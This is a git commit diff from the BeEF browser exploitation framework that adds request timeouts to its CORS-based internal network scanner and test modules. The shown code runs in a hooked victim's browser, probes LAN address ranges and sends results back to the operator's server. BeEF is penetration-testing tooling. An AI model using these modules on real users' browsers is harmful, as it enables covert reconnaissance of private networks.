Merge branch 'master' of https://github.com/beefproject/beef

2016-04-02 13:06:31 +02:00
parent edb44644fc d0255d6e9c
commit 309bbe4859
6 changed files with 13 additions and 7 deletions
--- a/arerules/lan_cors_scan.json
+++ b/arerules/lan_cors_scan.json
@@ -16,7 +16,8 @@
      "options": {
        "ipRange":"<<mod_input>>",
        "ports":"80,8080",
-        "threads":"5"
+        "threads":"3",
+        "timeout":"15"
      }
    }
  ],
--- a/arerules/lan_flash_scan.json
+++ b/arerules/lan_flash_scan.json
@@ -16,8 +16,8 @@
      "options": {
        "ipRange":"<<mod_input>>",
        "ports":"80,8080",
-        "threads":"5",
-        "timeout":"10"
+        "threads":"3",
+        "timeout":"15"
      }
    }
  ],
--- a/core/main/client/net/cors.js
+++ b/core/main/client/net/cors.js
@@ -17,9 +17,10 @@ beef.net.cors = {
     * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
     * @param url {String} url
     * @param data {String} request body
+     * @param timeout {Integer} request timeout in milliseconds
     * @param callback {Function} function to callback on completion
     */
-    request: function(method, url, data, callback) {
+    request: function(method, url, data, timeout, callback) {

    var xhr;
    var response = new this.response;
@@ -29,6 +30,7 @@ beef.net.cors = {

        if ('withCredentials' in xhr) {
            xhr.open(method, url, true);
+            xhr.timeout = parseInt(timeout, 10);
            xhr.onerror = function() {
            };
            xhr.onreadystatechange = function() {
--- a/modules/debug/test_cors_request/command.js
+++ b/modules/debug/test_cors_request/command.js
@@ -9,8 +9,9 @@ beef.execute(function() {
 	var method = "<%= @method %>";
 	var url    = "<%= @url %>";
 	var data   = "<%= @data %>";
+	var timeout = 15000;

-	beef.net.cors.request(method, url, data, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); });
+	beef.net.cors.request(method, url, data, timeout, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); });

 });

--- a/modules/network/cross_origin_scanner_cors/command.js
+++ b/modules/network/cross_origin_scanner_cors/command.js
@@ -10,6 +10,7 @@ beef.execute(function() {
  var ipRange = "<%= @ipRange %>";
  var ports   = "<%= @ports %>";
  var threads = "<%= @threads %>";
+  var timeout = <%= @timeout %>*1000;
  var wait = 2;

  if(!beef.browser.hasCors()) {
@@ -105,7 +106,7 @@ beef.execute(function() {
    for (var p=0; p < ports.length; p++) {
      var url = proto + '://' + ips[i] + ':' + ports[p];
      worker.queue('beef.net.cors.request(' +
-      '"GET", "'+url+'", "", function(response) {' +
+      '"GET", "'+url+'", "", '+timeout+', function(response) {' +
       'if (response != null && response["status"] != 0) {' +
        'beef.debug("[Cross-Origin Scanner] Received response from '+url+': " + JSON.stringify(response));' +
        'var title = response["body"].match("<title>(.*?)<\\/title>"); if (title != null) title = title[1];' +
--- a/modules/network/cross_origin_scanner_cors/module.rb
+++ b/modules/network/cross_origin_scanner_cors/module.rb
@@ -34,7 +34,8 @@ class Cross_origin_scanner_cors < BeEF::Core::Command
    return [
        {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
        {'name' => 'ports',   'ui_label' => 'Ports', 'value' => '80,8080'},
-        {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'}
+        {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '3'},
+        {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '15'}
    ]
  end